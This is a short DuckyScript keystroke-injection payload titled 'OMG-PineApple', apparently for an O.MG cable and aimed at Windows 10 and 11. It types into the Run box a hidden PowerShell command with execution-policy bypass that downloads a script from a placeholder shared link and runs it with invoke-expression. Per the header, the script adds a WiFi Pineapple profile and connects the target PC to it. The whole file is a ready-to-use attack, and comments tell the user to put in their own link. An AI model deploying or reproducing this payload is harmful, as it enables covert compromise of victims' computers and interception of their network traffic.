REM     Title: OMG-PineApple
REM     Author: I am Jakoby
REM     Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
REM     This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile
REM     The powershell script needed is provided as OMG-PineApple.ps1
REM     Target: Windows 10, 11
REM     Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
